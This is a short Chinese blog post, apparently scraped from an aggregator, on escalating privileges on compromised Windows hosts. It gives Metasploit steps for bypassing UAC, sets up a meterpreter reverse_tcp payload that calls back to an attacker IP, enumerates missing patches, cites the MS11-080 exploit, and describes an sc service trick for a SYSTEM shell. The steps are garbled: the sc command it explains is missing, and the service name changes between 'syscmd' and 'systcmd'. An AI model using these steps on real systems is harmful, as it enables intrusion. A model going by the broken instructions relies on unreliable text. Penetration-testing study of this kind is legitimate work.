渗透测试之内网提权

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了渗透测试之内网提权相关的知识,希望对你有一定的参考价值。

参考技术A UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。

当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac

开始提权

getsystem

提权失败   一般都是上面说的uac的问题  常识  bypass uac

输入background   让该会话在后台运行  不在这个模式下 没办法调用msf的提权模块

使用提权工具

set SESSION 2(这个session要和之前监听的那个session一样  否则不成功)

set TECHNIQUE up.exe

set TECHNIQUE EXE

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.107

show options

sessions -i

exploit

或者使用

use post/windows/gather/enum_patches

需要设置一下session

如果目标系统安装了安全更新的话是无法提权成功的

出现这种情况就是无法成功提权  可利用的漏洞都被打上补丁了

或者漏洞编号:ms11-080

windows 7、8、08、12、16下可以成功  2003也可以

关于sc命令:

SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。

这个命令的意思是创建一个名叫syscmd的新的交互式的cmd服务

然后执行

sc start systcmd,就得到了一个system权限的cmd环境

以上是关于渗透测试之内网提权的主要内容,如果未能解决你的问题,请参考以下文章

《Python黑帽子:黑客与渗透测试编程之道》读书笔记:Windows提权

《Python黑帽子:黑客与渗透测试编程之道》读书笔记:Windows提权

内网渗透测试理论学习之第三篇内网渗透权限提升

安全测试 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露弱口令密码暴力破解服务器提权Mysql数据库提权等 浅谈《社会工程学》实战案例

简单渗透测试流程

VulnHub渗透测试实战靶场 - Odin:1